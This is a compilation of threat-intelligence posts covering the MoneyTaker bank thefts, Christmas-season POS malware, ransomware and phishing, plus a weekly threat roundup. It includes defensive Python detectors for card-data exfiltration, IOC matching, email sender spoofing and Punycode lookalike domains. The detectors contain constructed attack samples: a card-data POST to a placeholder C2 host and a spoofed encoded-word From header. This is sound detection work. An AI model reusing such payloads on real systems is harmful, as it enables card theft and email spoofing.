A previously unknown, Russian-speaking threat group, dubbed “MoneyTaker,” is responsible for the theft of approximately $10 million USD from around 18 banks, according to Group-IB researchers. The targets were banks primarily located in the U.S. and Russia. The activity is ongoing and is believed to have begun approximately 18 months ago; the first attacks took place in spring 2016 against banks using the payment technology company “First Data’s” “STAR” network, a debit card processing and payment network. First Data has stated that “a number” of financial institutions on the STAR network had their credentials for administering debit cards compromised. The actors used custom malware, also called MoneyTaker, to manipulate payment orders and then used “money mules” to cash out the funds from ATMs.
Click here for Anomali Recommendation

Observed Threats

This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. Click here to request a trial.

Locky Tool Tip
Locky is ransomware that is widely spread via phishing messages. It first appeared in early 2016 and is strongly correlated with the cyber criminal groups behind the Dridex and Necurs botnets. Multiple waves of Locky samples are distributed daily, and the delivery mechanism has evolved over time: spam messages with executable attachments, MS Word attachments using macros to retrieve and execute Locky, and zip files containing JavaScript loaders that retrieve and execute it. Hosts compromised by Locky display a ransom note with instructions on how to decrypt the encrypted files, which are renamed with the .locky or .zepto extension.
Tags: Locky, Ransomware

Source: Honeypot Tech

[Strategic Security Report] Navigating the Threat Intelligence Maze

Most enterprises are using threat intel services, but many are still figuring out how to use the data they’re collecting. In this Dark Reading survey we give you a look at what they’re doing today – and where they hope to go.
Source: Cyber Monitoring

A Very Malicious Christmas

In 2017, Americans are projected to spend $906 million on gifts, up from $785 million in 2016. A significant chunk of that total will be spent online, and as consumers turn to the internet, those looking to exploit them follow at a similar rate.

Over the last five years, the festive season has seen actors ramping up Christmas-themed campaigns that directly target businesses and consumers. This post outlines a small number of particularly prolific attacks observed over previous Christmases that will very likely reappear in reworked form this year.


View details in ThreatStream: https://ui.threatstream.com/search?status=active&multiSearchResults=true&value__re=.*fastpos.*

Despite the increase in ecommerce transactions, in-person retail sales still account for the largest share of the market. Many consumers don’t think twice when they swipe their credit card or enter their PIN when buying that must-have gift. Unfortunately, some of these people might receive unwelcome expenses on their credit card statements come January if they’ve fallen victim to using a point-of-sale (POS) device infected with malware.

First seen in June 2016, FastPOS is just one piece of malware that targets POS devices. Much like other POS malware families, it captures credit card data (Track 2) and logs keystrokes on the infected machine. Notably, the malware communicates with its command and control (C&C) server over an unencrypted HTTP session. Like much other malware, it establishes persistence by creating an autorun key in the Windows registry.
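Because FastPOS ships card data over plain HTTP, the traffic itself can be inspected for Track 2 records before it leaves the store network. The Python script below is an added example, not FastPOS analysis code from Anomali or from this post: it assumes the standard Track 2 layout (start sentinel ";", PAN, "=", YYMM expiry, three-digit service code, discretionary data, "?" end sentinel), runs a Luhn check to drop random digit runs, and reports masked PANs only. The HTTP requests and the PAN values are constructed samples.

```python
import re

# Track 2 layout (assumed standard format): start sentinel ';', PAN of 13-19
# digits, separator '=', expiry YYMM, 3-digit service code, discretionary
# data, end sentinel '?'.
TRACK2_RE = re.compile(r';(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d{0,20})\?')


def luhn_ok(pan: str) -> bool:
    """Luhn mod-10 check; filters most random digit runs out of the matches."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the first six and last four digits so an alert never carries a full PAN."""
    return pan[:6] + '*' * (len(pan) - 10) + pan[-4:]


def find_track2(payload: str) -> list:
    """Return one finding per Luhn-valid Track 2 record in a text payload."""
    findings = []
    for m in TRACK2_RE.finditer(payload):
        pan, yy, mm, service, _discretionary = m.groups()
        if not luhn_ok(pan):
            continue
        findings.append({
            'pan_masked': mask_pan(pan),
            'expiry': yy + mm,
            'service_code': service,
            'offset': m.start(),
        })
    return findings


def scan_http_requests(requests: list) -> list:
    """Scan captured plaintext HTTP requests; only POST bodies are examined,
    since that is where a bulk upload of captured card data lands.
    Returns (request line, findings) pairs for requests that carry Track 2 data."""
    alerts = []
    for req in requests:
        head, _, body = req.partition('\r\n\r\n')
        if not head.startswith('POST '):
            continue
        hits = find_track2(body)
        if hits:
            alerts.append((head.split('\r\n')[0], hits))
    return alerts


# Constructed sample traffic (hosts and paths are placeholders).
# 4111111111111111 is a well-known Luhn-valid test PAN; 1234567890123456 is
# not Luhn-valid and must be ignored even though it has the Track 2 shape.
SAMPLE_REQUESTS = [
    'GET /index.html HTTP/1.1\r\nHost: shop.example\r\n\r\n',
    'POST /gate.php HTTP/1.1\r\nHost: c2.example\r\n'
    'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
    'id=TERM01&data=;4111111111111111=25121010000000000000?|;1234567890123456=2512101000?',
]

if __name__ == '__main__':
    for request_line, hits in scan_http_requests(SAMPLE_REQUESTS):
        print(request_line, hits)
```

The same matcher can be pointed at a proxy log or a packet capture's reassembled streams; the Luhn filter and the masking are what keep it usable as an alert source without turning the SIEM into another store of card numbers.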

Previously, FastPOS has taken advantage of the increased retail transaction volume in the run-up to Christmas. Various iterations of the FastPOS and other malware families targeting POS systems are likely to follow suit during the 2017 holiday season.

Protip for retailers: search for indicators of compromise (IOCs) tagged with “retail” in ThreatStream to uncover threats to your operations over Christmas.

Lizard Squad

View details in ThreatStream: https://ui.threatstream.com/search?status=active&multiSearchResults=true&value__re=.*lizard%20squad.*

In 2014, Lizard Squad performed a distributed denial-of-service (DDoS) attack against the Xbox Live and Sony PlayStation networks over Christmas. As millions (including myself) attempted to play the games they’d just received as gifts, they were met with errors for the duration of the attack.

ThreatStream attributes a number of attacks to Lizard Squad, with DDoS being their preferred method. Since the group’s inception they have developed increasingly sophisticated DDoS capabilities and are now using variations of the GafGyt botnet malware.

Protip for gaming companies: sync indicators of compromise (IOCs) from ThreatStream with your SIEM to automatically match known threats to your logs, and alert when a match has been found.

Merry X-Mas

View details in ThreatStream: https://ui.threatstream.com/search?status=active&multiSearchResults=true&value__re=.*Merry%20Christmas%20Ransomware.*

2017 has been the year of ransomware. From WannaCry to Petya and everything else in between, ransomware has brought havoc to companies around the world. The NotPetya ransomware will reportedly cost shipping giant Maersk $300 million alone!

The Merry Christmas (or Merry X-Mas) ransomware was spotted for the first time by security researchers in early January 2017, when the malware was distributed through spam campaigns. According to researchers, the latest strains of the ransomware have been delivered together with other pieces of malware, namely DiamondFox, which is used to steal sensitive information from victims’ systems.

Protip for SecOps teams: be immediately alerted when the latest malware hashes or suspected domain generation algorithm (DGA) domains are seen inside your network (including on mobile devices) using Anomali Enterprise.

Phishing for gifts

View search in ThreatStream: https://ui.threatstream.com/search?value__re=.*christmas.*

A quick search for malicious domains in ThreatStream turns up hundreds of IOCs with the word “christmas.” Phishing campaigns often ramp up over the festive period, taking advantage of the fact people are spending more money in December. I’ve seen campaigns spoofing retailers and financial institutions in greater number this year than in any previous year I can recall.

Protip for everyone: never click a link in an email. For SecOps teams, monitor emails from compromised addresses or with links to known malicious domains before they’re clicked using Anomali Enterprise.
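Matching feed indicators against your own logs is the mechanism behind the protips above (SIEM sync, hash and DGA alerts, and links to known malicious domains in email). The Python below is an added example, not Anomali Enterprise or ThreatStream code: it assumes an indicator export reduced to (type, value) pairs and a line-oriented log, and every indicator, host and log line in it is a constructed placeholder. Domains match on the indicator itself and on any subdomain of it; hashes match case-insensitively.

```python
import ipaddress
import re

# Constructed indicator set in the shape a feed export might be reduced to:
# one (type, value) pair per indicator. Placeholders only, not real IOCs.
IOCS = [
    ('domain', 'bad-gifts.example'),
    ('domain', 'xmas-deals.example'),
    ('ipv4', '203.0.113.77'),
    ('sha256', '9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08'),
]

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
HOST_RE = re.compile(r'\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b', re.I)
SHA256_RE = re.compile(r'\b[0-9a-f]{64}\b', re.I)


class IocMatcher:
    """Extracts hashes, IPv4 addresses and hostnames from free-form log lines
    and checks each against the indicator set."""

    def __init__(self, iocs):
        self.domains = {v.lower() for t, v in iocs if t == 'domain'}
        self.ips = {ipaddress.ip_address(v) for t, v in iocs if t == 'ipv4'}
        self.hashes = {v.lower() for t, v in iocs if t == 'sha256'}

    def _domain_hit(self, host):
        # Match the indicator itself and any subdomain (cdn.bad-gifts.example).
        parts = host.lower().rstrip('.').split('.')
        for i in range(len(parts) - 1):
            candidate = '.'.join(parts[i:])
            if candidate in self.domains:
                return candidate
        return None

    def match_line(self, line):
        hits = []

        def add(hit):
            if hit not in hits:          # one alert per indicator per line
                hits.append(hit)

        for h in SHA256_RE.findall(line):
            if h.lower() in self.hashes:
                add(('sha256', h.lower()))
        for ip in IPV4_RE.findall(line):
            try:
                if ipaddress.ip_address(ip) in self.ips:
                    add(('ipv4', ip))
            except ValueError:           # e.g. 999.1.1.1 looks like an IP but is not
                pass
        for host in HOST_RE.findall(line):
            d = self._domain_hit(host)
            if d:
                add(('domain', d))
        return hits

    def scan(self, lines):
        """Return (line number, line, hits) for every line with at least one hit."""
        results = []
        for n, line in enumerate(lines, 1):
            hits = self.match_line(line)
            if hits:
                results.append((n, line, hits))
        return results


# Constructed log lines from three imaginary sources: a web proxy, a mail
# gateway and an endpoint agent. Addresses are documentation ranges.
SAMPLE_LOGS = [
    '2017-12-11T09:12:01Z proxy src=10.0.0.21 dst=198.51.100.5 host=shop.example action=allow',
    '2017-12-11T09:12:44Z proxy src=10.0.0.21 dst=203.0.113.77 host=cdn.bad-gifts.example action=allow',
    '2017-12-11T09:13:02Z mailgw from=promo@xmas-deals.example to=staff@corp.example '
    'url=http://xmas-deals.example/gift',
    '2017-12-11T09:15:30Z edr host=WS-0042 file=C:\\Users\\a\\Downloads\\invoice.exe '
    'sha256=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08',
]

if __name__ == '__main__':
    for n, line, hits in IocMatcher(IOCS).scan(SAMPLE_LOGS):
        print(n, hits)
```

Run as written it alerts on lines 2 to 4 and stays quiet on line 1. The subdomain walk in _domain_hit is the part most worth keeping: a feed entry for a registered domain should fire on whatever host label the campaign happens to use that week.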

A few free Christmas gifts from Anomali

STAXX gives you an easy way to access any STIX/TAXII feed and is a great tool for those starting to incorporate threat intelligence into their security strategies. 

You can download STAXX for free here — our gift to you this Christmas.

Understand your security risk posture with a free customized Recon Report from Anomali Labs. Simply sign up for a free Anomali Enterprise Trial in the month of December.

A December to Remember

Source: Honeypot Tech

WTB: German Spy Agency Warns of Chinese LinkedIn Espionage

The intelligence in this week’s iteration discusses the following threats: APT, Banking trojan, Botnet, Data leak, Malspam, Malvertising, Pre-installed keylogger, Ransomware, Targeted attacks, Vulnerabilities. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

German Spy Agency Warns of Chinese LinkedIn Espionage (December 10, 2017)
The German intelligence agency, the Federal Office for the Protection of the Constitution (BfV), has stated that Chinese intelligence is using the networking website “LinkedIn” to target approximately 10,000 Germans. The BfV released information regarding multiple fake LinkedIn profiles it discovered and believes that the accounts are evidence of China’s efforts to spy on, and possibly recruit, German individuals and to subvert German politics.
Tags: Targeted attacks, LinkedIn
Click here for Anomali Recommendation

Pre-Installed Keylogger Found On Over 460 HP Laptop Models (December 8, 2017)
A security researcher going by the name “ZwClose” has released information regarding a pre-installed keylogger located in the “Synaptics” touchpad driver. The Synaptics driver is shipped with HP machines, and approximately 460 HP models were observed to contain this keylogging feature. Researchers note that the keylogger feature is disabled by default; however, threat actors could use open source tools to bypass User Account Control and enable the keylogger “by setting a registry value.”
Tags: Pre-Installed threat, Keylogger, HP
Click here for Anomali Recommendation

A Peculiar Case of Orcus RAT Targeting Bitcoin Investors (December 7, 2017)
As the value of the “Bitcoin” cryptocurrency continues to increase (approximately $17,740 USD as of this writing), threat actors are likewise increasing their efforts to target Bitcoin investors. Fortinet researchers have found that actors are targeting Bitcoin investors with a Remote Access Trojan (RAT) called “Orcus” via a phishing campaign. The phishing emails purport to be an announcement of a new, legitimate bitcoin trading bot called “Gunbot.” The email attachment contains a VB script that, when executed, will download a file impersonating a .jpeg. The .jpeg file is actually a portable executable binary file. The executable was found to be a trojanized version of an open source inventory tool called “TTJ-Inventory System.” Inside this malicious version, researchers discovered the presence of the “Orcus” RAT, which is advertised as a Remote Access Tool created by Orcus Technologies. Orcus has numerous features and commands that it can run; however, researchers note that what separates Orcus from other RATs is the ability to load custom plugins.
Tags: Targeted attacks, Bitcoin investors, Malspam, Orcus RAT
Click here for Anomali Recommendation

New Targeted Attack in the Middle East by APT34, A Suspected Iranian Threat Group, Using CVE-2017-11882 (December 7, 2017)
FireEye researchers have published a report regarding a new Advanced Persistent Threat (APT) group they have dubbed “APT34.” The group is believed to be based in Iran, and has been observed exploiting a Microsoft Office vulnerability (CVE-2017-11882) that Microsoft patched on November 14, 2017. The vulnerability was exploited while attacking an unnamed government organization in the Middle East. Researchers believe that the APT group has been conducting a long-term cyber espionage campaign to benefit Iranian national interests. The group is believed to have been active since at least 2014. The group was observed using spear phishing emails that attempt to drop public and custom malicious tools, such as the group’s custom PowerShell backdoor, to achieve its goals.
Tags: APT, APT34, Targeted attacks
Click here for Anomali Recommendation

Master Channel: The Boleto Mestre Campaign Targets Brazil (December 7, 2017)
Palo Alto Unit 42 researchers have discovered a new malspam campaign, dubbed “The Boleto Mestre Campaign” because the links and attachments in the emails masquerade as “Boleto Bancário.” Boleto Bancário is an official payment method that is regulated by the Central Bank of Brazil. Researchers have observed over 260,000 emails that fall under this theme since June 2017. The objective of this campaign is to trick a user into following a malicious link or opening a document that will infect the recipient with an information stealing trojan.
Tags: Malspam, Boleto Bancario-themed, Data theft
Click here for Anomali Recommendation

Mailsploit: It’s 2017, and You Can Spoof The “From” in Email to Fool Filters (December 6, 2017)
Penetration tester Sabri Haddouche has discovered that more than 30 email clients are vulnerable to email source spoofing; the vulnerability has been dubbed “Mailsploit.” The email clients are vulnerable to spoofing because of improper implementation of Request For Comments (RFC) 1342 (which dates back to 1992), which can allow source spoofing that bypasses spam filters and security features such as Domain-based Message Authentication, Reporting and Conformance (DMARC). RFC 1342 covers the representation of non-ASCII characters in Internet message headers. Haddouche identified that the mail client interfaces do not properly sanitize a non-ASCII string after it is decoded.
Tags: Vulnerability, Mailsploit, Email clients
Click here for Anomali Recommendation
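The defensive lesson of the Mailsploit finding is to take the routing address from the raw header before any decoding, and to sanitize the decoded display name afterwards. The Python below is an added example, not Haddouche’s or any mail client’s code: it relies on the standard library’s encoded-word decoder and address parser, and the From headers in it are constructed samples (one benign, one whose decoded name carries a control character and address-like text, which is the shape of problem the article describes).

```python
import re
from email.header import decode_header
from email.utils import parseaddr

CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')   # NUL, newline, other C0 controls
ADDRESS_LIKE = re.compile(r'[<>@]')               # text that could read as an address


def decode_words(value: str) -> str:
    """Decode RFC 1342 / RFC 2047 encoded-words into one Unicode string."""
    out = []
    for chunk, charset in decode_header(value):
        if isinstance(chunk, bytes):               # bytes whenever encoded-words are present
            chunk = chunk.decode(charset or 'ascii', errors='replace')
        out.append(chunk)
    return ''.join(out)


def safe_sender(raw_from: str):
    """Return (display_name, address, suspicious) for a raw From header.

    The routing address is parsed from the undecoded header, so nothing inside
    an encoded-word can replace it. Only the display name is decoded, and it is
    then checked: control characters or address-like text inside a decoded
    name have no legitimate use, so the header is flagged and the name shown
    to the user is replaced by the real address.
    """
    name_raw, address = parseaddr(raw_from)
    name = decode_words(name_raw)
    suspicious = bool(CONTROL_CHARS.search(name) or ADDRESS_LIKE.search(name))
    if suspicious:
        return address, address, True
    return name.strip(), address, False


# Constructed sample headers; the domains are documentation placeholders.
BENIGN_FROM = '=?utf-8?Q?Andr=C3=A9_M=C3=BCller?= <andre@example.org>'
SUSPICIOUS_FROM = '=?utf-8?Q?Alice_=0A=3Cceo=40corp.example=3E?= <attacker@evil.example>'

if __name__ == '__main__':
    for hdr in (BENIGN_FROM, SUSPICIOUS_FROM):
        print(safe_sender(hdr))
```

The order of operations is the whole point: a client that decodes first and parses second lets the decoded bytes participate in address parsing, which is the class of bug described above. Parsing first, decoding second, then validating what came out of the decoder closes it.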

StorageCrypt Ransomware Infecting NAS Devices Using SambaCry (December 5, 2017)
A new ransomware, dubbed “StorageCrypt,” is targeting Network-Attached Storage (NAS) devices, according to Bleeping Computer researchers. The threat actors behind this campaign are using the Linux Samba vulnerability “SambaCry.” Samba is a suite of programs that provides Windows file and print services on Linux and Unix. Exploitation of the vulnerability allows an actor to open a command shell on the affected machine that can be used to download files and execute commands. The actors are demanding a ransom of anywhere between 0.4 (approximately $6,356 USD) and 2 (approximately $31,779 USD) bitcoins for the decryption key.
Tags: Ransomware, StorageCrypt, Vulnerability, SambaCry
Click here for Anomali Recommendation

Quantize or Capitalize (December 5, 2017)
Forcepoint researchers have found that the “Quant” trojan loader, usually used to distribute “Locky” ransomware and the information stealing malware “Pony,” has added new features to its malicious capabilities. Quant is now able to steal credentials as well as various cryptocurrencies including Bitcoin, Peercoin, Primecoin, and Terracoin. The credential stealing feature is accomplished via a Delphi-based library that is capable of stealing operating system and application login credentials.
Tags: Malware, Downloader, Quant, Credential theft
Click here for Anomali Recommendation

Virtual Keyboard Developer Leaked 31 Million of Client Records (December 5, 2017)
A MongoDB database that appears to belong to the Tel Aviv-based startup company “AI.Type” was configured for public access, exposing approximately 31 million user records, according to the Kromtech Security Center. The company designed a virtual keyboard that works on mobile devices for both Android and iOS. The exposed database contained 557 gigabytes of data that consists of user registration records in addition to information that was entered onto the keyboard.
Tags: Misconfigured database, MongoDB, Data leak
Click here for Anomali Recommendation

Dridex is Back, Baby! – Necurs Botnet Malspam Pushes Dridex (December 4, 2017)
Researchers have discovered that the “Necurs” botnet has resumed its distribution of the “Dridex” banking malware. Researchers note that the last occurrence of Necurs Dridex distribution was identified in June 2017, and that this Necurs campaign is separate from the “Globeimposter” ransomware campaign. The emails purport to discuss a credit card payment and provide a link to receive confirmation of the payment. If the link is followed, it retrieves a malicious Word document. Inside the document is an embedded object that generates up to four URLs to retrieve the Dridex installer.
Tags: Malspam, Botnet, Necurs, Banking trojan, Dridex
Click here for Anomali Recommendation

Apache Software Foundation Releases Security Updates (December 4, 2017)
An alert has been released by the United States Computer Emergency Readiness Team (US-CERT) concerning vulnerabilities in Apache products. Specifically, the vulnerabilities are located in Apache Struts versions 2.5 through 2.5.14. The US-CERT states that an actor could exploit one of these vulnerabilities to take control of an affected system. One of the vulnerabilities can be exploited by an actor via a custom JSON request that can be used to conduct a Denial-of-Service (DoS) when using an outdated json-lib with Struts REST plugin. The second vulnerability is located in the Jackson JSON library, however, the impact of the issue is, as of this writing, still being researched further.
Tags: Alert, Vulnerabilities, Apache
Click here for Anomali Recommendation

Mozilla Releases Security Update for Firefox (December 4, 2017)
The United States Computer Emergency Readiness Team (US-CERT) has issued an alert regarding vulnerabilities located in the Mozilla Firefox web browser. The US-CERT states that a remote threat actor could exploit these vulnerabilities to take control of an affected system. The vulnerabilities are registered as “CVE-2017-7843” and “CVE-2017-7844.” The former involves Private Browsing mode storing data across multiple private browsing sessions. The latter involves an external SVG image referenced on one page; the coloring of anchor links stored within the image can be used to determine which pages a user has in their history.
Tags: Alert, Vulnerabilities, Mozilla, Firefox web browser
Click here for Anomali Recommendation

Necurs Botnet Malspam Pushed Globeimposter Ransomware (December 4, 2017)
Researchers have observed that the “Necurs” botnet, known for distributing “Locky” ransomware, is currently distributing the “Globeimposter” ransomware. The ransomware is being distributed via malspam that contains malicious attachments. The emails purport that a message is ready to be sent with the following file or link attachments, or that an attached file is a confirmation of a credit card payment per the recipient’s request. Opening the attachment will begin the infection process for Globeimposter. The threat actors behind this campaign are demanding 0.088 Bitcoin (approximately $1,037 USD) for the decryption key.
Tags: Malspam, Botnet, Necurs, Ransomware, Globeimposter
Click here for Anomali Recommendation

Seamless Campaign Serves RIG EK via Punycode (December 4, 2017)
Malwarebytes Labs researchers have published information regarding the history and current activity of the “Seamless” malvertising campaign. The Seamless campaigns are known for almost exclusively distributing the “Ramnit” banking trojan via the RIG exploit kit. Threat actors are currently running two Seamless campaigns simultaneously: one that uses static strings and IP literal URLs (URLs that skip DNS), and another that uses special characters. In the latter campaign, actors are using a Cyrillic-based domain name that is then encoded via “Punycode” (the encoding used to represent Unicode characters in ASCII domain labels). According to researchers, the malvertisements are typically distributed via adult portals that redirect to malicious domains to begin the infection process for Ramnit.
Tags: Malvertising, Seamless campaign, RIG EK, Trojan, Ramnit
Click here for Anomali Recommendation
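A proxy or DNS log can be checked for Punycode hosts whose decoded labels mix scripts, or consist of Cyrillic letters that render like Latin ones. The Python script below is an added example, not Malwarebytes’ or Anomali’s detection logic: it decodes xn-- labels with the standard library idna codec, classifies each non-ASCII label, and uses a constructed confusables subset plus constructed log lines. The sample hostnames are built from Unicode strings inside the script, so the xn-- forms are exact, and none of them is real infrastructure.

```python
import re
import unicodedata

# Cyrillic letters that render like Latin letters in common fonts. Written as
# escapes so the code points are unambiguous. Constructed subset for
# illustration; a production list would follow Unicode TR39 confusables.
CONFUSABLE = {
    '\u0430': 'a', '\u0435': 'e', '\u043e': 'o', '\u0440': 'p', '\u0441': 'c',
    '\u0443': 'y', '\u0445': 'x', '\u0456': 'i', '\u0458': 'j', '\u0455': 's',
}


def to_punycode(unicode_domain: str) -> str:
    """ASCII (xn--) form of a Unicode domain; used here only to build samples."""
    return unicode_domain.encode('idna').decode('ascii')


def decode_label(label: str):
    """Unicode form of one label, or None if an xn-- label does not decode."""
    if label.lower().startswith('xn--'):
        try:
            return label.encode('ascii').decode('idna')
        except UnicodeError:
            return None
    return label


def script_of(ch: str) -> str:
    name = unicodedata.name(ch, '')
    return name.split(' ')[0] if name else 'UNKNOWN'


def analyze_domain(domain: str) -> list:
    """One (kind, label, detail) finding per label that is not plain ASCII:
    'mixed-script' (letters from two scripts), 'homograph' (every non-Latin
    letter has a Latin lookalike, detail is the Latin skeleton),
    'non-ascii' (a genuine internationalized name) or 'undecodable'."""
    findings = []
    for label in domain.rstrip('.').split('.'):
        text = decode_label(label)
        if text is None:
            findings.append(('undecodable', label, ''))
            continue
        if text.isascii():
            continue
        scripts = {script_of(c) for c in text if c.isalpha()}
        skeleton = ''.join(CONFUSABLE.get(c, c) for c in text)
        if len(scripts) > 1:
            findings.append(('mixed-script', label, text))
        elif skeleton.isascii():
            findings.append(('homograph', label, skeleton))
        else:
            findings.append(('non-ascii', label, text))
    return findings


HOST_RE = re.compile(r'https?://([^/\s:]+)')


def scan_proxy_log(lines: list) -> list:
    """Return (host, findings) for requests whose host looks like a lookalike domain."""
    alerts = []
    for line in lines:
        m = HOST_RE.search(line)
        if not m:
            continue
        host = m.group(1)
        findings = analyze_domain(host)
        if any(kind in ('mixed-script', 'homograph') for kind, _, _ in findings):
            alerts.append((host, findings))
    return alerts


# Constructed Unicode hostnames (escapes keep the Cyrillic letters unambiguous).
CYRILLIC_ONLY = '\u043f\u0440\u0438\u043c\u0435\u0440.\u0440\u0444'   # a legitimate all-Cyrillic name
MIXED_SCRIPT = '\u0435xample.com'                                    # Cyrillic ie + Latin "xample"
HOMOGRAPH = '\u0440\u0430\u0441\u0435.com'                            # all Cyrillic, renders as "pace"

# Constructed proxy log lines; the IDN hosts are derived from the strings above.
SAMPLE_LOG = [
    '2017-12-04T10:01:12Z 10.0.0.8 GET http://www.example.com/ 200',
    f'2017-12-04T10:01:40Z 10.0.0.8 GET http://{to_punycode(CYRILLIC_ONLY)}/news 200',
    f'2017-12-04T10:02:05Z 10.0.0.9 GET http://{to_punycode(MIXED_SCRIPT)}/login 302',
    f'2017-12-04T10:02:31Z 10.0.0.9 GET http://{to_punycode(HOMOGRAPH)}/update 200',
]

if __name__ == '__main__':
    for host, findings in scan_proxy_log(SAMPLE_LOG):
        print(host, findings)
```

Only the mixed-script and homograph classes are raised as alerts; a name that is wholly Cyrillic and does not skeletonize to Latin letters is ordinary internationalized traffic and is left alone, which keeps the rule usable on networks with genuine non-Latin destinations.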

Observed Threats

RIG exploit kit Tool Tip
The RIG exploit kit is a framework used to exploit client-side vulnerabilities in web browsers. It takes advantage of vulnerabilities in Internet Explorer, Adobe Flash, Java and Microsoft Silverlight, and was first observed in early 2014. The RIG exploit kit’s objective is to deliver malicious code to the target system; it is known to distribute ransomware, spambots and backdoors. Victims are redirected to a RIG exploit kit landing page from malvertising or compromised sites.
Tags: RIG, exploitkit

Source: Honeypot Tech

What is Threat Intelligence?

Written by Steve Miller and Payton Bush

Threat intelligence is a subset of intelligence focused on information security. Gartner (sorry, people) defines threat intelligence as “evidence-based knowledge…about an existing or emerging menace or hazard…to inform decisions regarding the subject’s response to that menace or hazard.” In short, threat intelligence is curated information intended to inform you and help you make better decisions about how to stop bad things from happening to you.

There are a few schools of thought and several sets of vernacular used to describe cyber threat intelligence. But there are generally three “levels” of cyber threat intelligence: strategic, operational and tactical. Some of the similarities and differences between these kinds of intelligence are summarized below:

Collecting each flavor of intelligence is important because they serve different functions.

Type | Tagline | Half life of utility (for good guys and bad guys) | Focus | Built on the analysis of | Output data types
Strategic | | Long (multiyear) | Non-technical | Big campaigns, groups, multi-victim intrusions (and operational intel) | Long form writing about: victimology, YoY methodology, mapping intrusions and campaigns to conflicts, events and geopolitical pressures
Operational | | Medium (one year plus) | Mixed (both really) | Whole malware families, threat groups, human behavior analysis (and tactical intel) | Short form writing, bulleted lists, about: persistence and comms techniques, victims, group profiles, family profiles, TTP descriptions, triggers, patterns, and methodology rules
Tactical | What? | Short (months) | Technical | Security events, individual malware samples, phishing emails, attacker infrastructure | Atomic and machine-readable indicators such as IPs, domains, IOCs, “signatures”

Analysts deal with a lot of alerts. Alerts enriched with tactical intelligence provide more context and help analysts determine which threats are worth worrying about and which can safely be ignored. These atomic indicators are often changed quickly, though, which makes it important to also incorporate operational and strategic intelligence into decisions.

Operational intelligence helps fuel meaningful detection, incident response and hunting programs. For example, it can help identify patterns in attacks from which we can create logical rules in detection systems that flag the malicious activity itself rather than only specific indicators.

Strategic intelligence can help with assessing and mitigating current and future risks to organizations. For example, a corporation releasing a new product or completing a merger will want to understand not only the potential impact but also the associated risks. This intelligence is particularly useful for people in leadership roles such as CISOs and executive leadership who must justify budgets and make better informed investment decisions.

The sum of these different kinds of threat intelligence is the ability to make informed decisions on how to proactively and reactively respond to threats. This includes what solutions to use, how they should be leveraged, and even just who to keep tabs on.

Check back in January for a deeper look into what these three kinds of intelligence look like and how they’re used.

Source: Honeypot Tech

Improve Signal-to-Noise Ratio with 'Content Curation': 5 Steps

By intelligently managing signatures, correlation rules, filters and searches, you can see where your security architecture falls down, and how your tools can better defend the network.
Source: Cyber Monitoring